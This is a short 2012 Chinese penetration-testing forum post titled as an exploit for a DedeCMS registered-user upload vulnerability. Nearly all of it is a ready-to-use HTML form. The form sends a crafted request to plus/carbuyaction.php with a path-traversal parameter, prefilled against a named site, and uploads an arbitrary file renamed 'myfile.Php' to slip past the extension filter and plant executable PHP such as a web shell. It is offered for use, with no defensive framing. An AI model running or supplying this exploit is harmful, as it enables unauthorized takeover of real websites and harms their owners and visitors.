中国网络渗透测试联盟

标题: dedecms注册用户上传漏洞利用exp [打印本页]

作者: admin 时间: 2012-10-19 08:36
标题: dedecms注册用户上传漏洞利用exp
<form action="" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text" value="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" name="doaction" style="width:800"><br /> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script>

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)